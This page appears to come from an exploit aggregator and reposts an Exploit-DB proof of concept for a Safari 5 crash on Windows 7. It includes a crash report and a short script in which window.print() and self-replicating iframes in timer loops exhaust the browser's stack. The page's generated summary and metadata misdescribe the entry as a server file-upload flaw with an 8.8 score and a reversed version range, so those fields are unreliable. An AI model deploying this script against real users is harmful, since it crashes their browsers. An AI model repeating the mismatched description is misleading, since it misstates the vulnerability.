header-logo
Suggest Exploit
vendor:
Windows 7
by:
Mathias Karlsson
8,8
CVSS
HIGH
Unrestricted File Upload
434
CWE
Product Name: Windows 7
Affected Version From: 5.31.22.7
Affected Version To: 5.31.22.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows 7
2020

Crash Report

This exploit allows an attacker to upload a malicious file to a vulnerable server. The malicious file is then executed on the server, allowing the attacker to gain access to the server. The exploit is triggered by setting the iframe src property to an external document containing the window.print() command. This allows the user to bypass the first print popup.

Mitigation:

Ensure that all file uploads are properly validated and restricted to only allow files of the expected type and size.
Source

Exploit-DB raw data:

<html>

<---------------------
Crash Report

  Problem Event Name:   APPCRASH
  Application Name:     Safari.exe
  Application Version:  5.31.22.7
  Application Timestamp:        4b8f94fa
  Fault Module Name:    JavaScriptCore.dll
  Fault Module Version: 5.31.22.5
  Fault Module Timestamp:       4b8cb88c
  Exception Code:       c00000fd
  Exception Offset:     000889f7
  OS Version:   6.1.7600.2.0.0.256.48
  Locale ID:    1053
  Additional Information 1:     d4bb
  Additional Information 2:     d4bb5342a8501f1ef1ad79845414ed25
  Additional Information 3:     57f4
  Additional Information 4:     57f4717a3dd18c61a213b49009cb5bb7

Tested on: Microsoft Windows 7
By: Mathias Karlsson
URL: http://h.ackack.net/

Note:
If you set the iframe src property to an external document containing the window.print(), the user does not have to press away the first print popup.

---------------------->

<script>
window.print();
a();
function a()
{
        setInterval(b,0);
}
function b()
{
        var c = document.createElement("iframe");
        c.setAttribute("src",document.location);
        document.getElementsByTagName("body")[0].appendChild(c);
        setInterval(a,0);
}
</script>
</html>

Navigation

Suggest Exploit

Services By CQR